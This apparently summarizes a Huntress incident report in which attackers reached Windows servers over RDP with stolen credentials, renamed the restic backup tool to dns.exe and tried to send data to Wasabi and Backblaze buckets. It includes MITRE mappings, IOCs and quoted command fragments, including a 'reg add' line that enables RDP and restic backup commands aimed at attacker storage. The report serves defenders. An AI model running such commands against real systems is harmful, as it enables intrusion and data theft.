Using Backup Utilities for Data Exfiltration

Huntress observed threat actors using the legitimate backup tool restic (renamed dns.exe in one instance) to attempt data exfiltration to cloud storage endpoints. The attack involved RDP access with compromised credentials, tooling download and execution, environment-variable configuration for S3 credentials, and repeated restic commands before containment. #restic #Huntress

Keypoints

Initial access to a Windows Server 2019 endpoint was obtained via RDP using previously compromised credentials from an endpoint named “debian”.
The attacker downloaded a scanner utility (saved as system.exe) and experienced DCOM communication errors while enumerating hosts.
An archive retrieved from attacker-controlled storage contained restic, which was renamed to dns.exe on one endpoint and executed to target S3-compatible buckets for backup/exfiltration.
The actor set environment variables (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, RESTIC_PASSWORD) and issued repeated restic backup/init commands against Wasabi and Backblaze B2 endpoints.
Registry modification (reg add) was used to enable RDP on a second endpoint, and the attacker accessed the second host via network logons to run restic there as well.
Repeated failed attempts to run restic suggest the actor may not have successfully completed exfiltration before both endpoints were isolated.
IOCs include the NetBIOS name “debian”, S3 endpoints (wasabisys and backblazeb2), and multiple SHA-256 hashes for system.exe and restic variants.

MITRE Techniques

[T1078.002] Valid Accounts – Use of compromised credentials to authenticate via RDP (‘accessed via RDP, using previously compromised credentials’).
[T1133] External Remote Services – Remote access via RDP from an external endpoint named “debian” to the Windows Server 2019 host (‘accessed via RDP, using previously compromised credentials, from an endpoint named “debian.”’).
[T1059.003] Windows Command Shell – Use of cmd.exe to modify the registry to enable RDP (‘cmd.exe /Q /c reg add “HKLMsystemCurrentControlSetControlTerminal Server” /v fDenyTSConnections …’).
[T1027] Obfuscated Files or Information – Renaming and bundling of legitimate tools (restic renamed to dns.exe; system.exe) to hide intent (‘downloaded an archive from which they extracted the restic backup application, which they renamed to dns.exe’).
[T1560.001] Archive via Utility – Use of a backup utility (restic) to package data for exfiltration (‘restic.exe -r s3:… backup “”‘).
[T1039] Data from Network Shared Drive – Targeting of file shares for backup/exfiltration (‘backup “”‘ and ‘backup “”‘).
[T1567] Exfiltration to Cloud Storage – Directing backups to S3-compatible cloud storage endpoints (Wasabi, Backblaze B2) as the exfiltration channel (‘-r s3:https://s3.us-central-1.wasabisys[.]com/… init’).

Indicators of Compromise

[NetBIOS name] threat actor endpoint – debian (used as the origin for RDP access)
[Domains] exfiltration endpoints – s3.us-central-1.wasabisys[.]com, s3.us-east-005.backblazeb2[.]com
[File names] downloaded/renamed tools – system.exe (scanner utility), dns.exe (restic renamed)
[File hashes] malicious binaries – system.exe SHA-256: 6c176e9c2a7eaf4e…b57f8, restic/dns.exe SHA-256: 98394683d8f30ce9…cdc1d, and 1 more hash (restic.exe SHA-256: 75d4148e…35cac)

Huntress observed the technical workflow beginning with RDP access using compromised credentials from an endpoint labeled “debian.” The attacker performed light discovery (viewing individual text/CSV/PDF files), downloaded a scanner utility (saved as system.exe), and encountered DCOM communication errors while probing the network. They retrieved an archive from cloud storage, extracted restic, and in one case renamed it to dns.exe for execution.

The adversary then attempted to exfiltrate data by running restic commands targeting S3-compatible buckets (Wasabi and Backblaze B2), setting environment variables for AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, and RESTIC_PASSWORD prior to execution. Commands observed included restic backup operations against specific shares and an init against a Wasabi endpoint; multiple repeated attempts and changing credentials suggest authentication or configuration issues prevented a successful run.

To expand access, the attacker enabled RDP on a second host via a registry modification (reg add) and used network logons to launch restic there as well. Containment actions isolated both endpoints before successful exfiltration was observed; no additional persistence mechanisms (RMM installation or account creation) were detected in the timeline.